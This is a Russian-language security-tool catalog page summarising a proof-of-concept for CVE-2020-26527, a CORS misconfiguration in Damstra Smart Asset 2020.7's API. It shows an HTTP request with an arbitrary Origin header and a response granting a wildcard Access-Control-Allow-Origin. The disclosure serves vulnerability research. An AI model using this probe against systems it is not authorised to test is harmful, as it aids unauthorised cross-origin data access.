Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
SmartAsset-CORS-CVE-2020-26527 — Proof-of-concept для CVE-2020-26527: демонстрирует неправильную конфигурацию CORS в API Damstra Smart Asset 2020.7, которая доверяет произвольным источникам, позволяя доступ к данным из других источников. | Kitploit
Инструменты/GitHubGitHub/lukaszstu/smartasset-cors-cve-2020-26527
Анализ уязвимостейВеб-безопасностьТестирование на ПроникновениеНеправильная КонфигурацияБезопасность API
GitHublukaszstu/smartasset-cors-cve-2020-26527

SmartAsset-CORS-CVE-2020-26527

Proof-of-concept для CVE-2020-26527: демонстрирует неправильную конфигурацию CORS в API Damstra Smart Asset 2020.7, которая доверяет произвольным источникам, позволяя доступ к данным из других источников.

Репозиторий
65 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

SmartAsset-CORS-CVE-2020-26527

CVE-2020-26527

Smart Asset - версия 2020.7

Проблема была обнаружена в API/api/Version в Damstra Smart Asset 2020.7. Механизм CORS доверяет случайным источникам, принимая произвольный заголовок 'Origin: example.com' и отвечая кодом 200 OK и подстановочным заголовком 'Access-Control-Allow-Origin: *'.

HTTP-запрос:

GET /API/api/Version HTTP/1.1 Origin: https://StudniarzLukasz.com <-------------------------------------- Cookie: _ga=GA1.3.1950130407.1600387365; _gid=GA1.3.1208628208.1600387365; _gat_gtag_UA_100469070_4=1; ajs_group_id=null; intercom-id-zk1ecu97=47f0bf3f-35aa-4f97-9239-456a2678da65; intercom-session-zk1ecu97=

HTTP-ответ:

HTTP/1.1 200 OK Access-Control-Allow-Origin: * <--------------------------------------- Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept, Authorization Strict-Transport-Security: max-age=31536000; includeSubDomains

{"Version":"2020.5 (Build 36 Revision 40954)","AssemblyVersion":"20.5.36.40954","BuildDate":"2020-07-27T13:21:18+10:00","CompanyName":"SmartAsset Software","LegalCopyright":"Copyright .. SmartAsset <>


[Обнаружил] Lukasz Studniarz

Скачать инструмент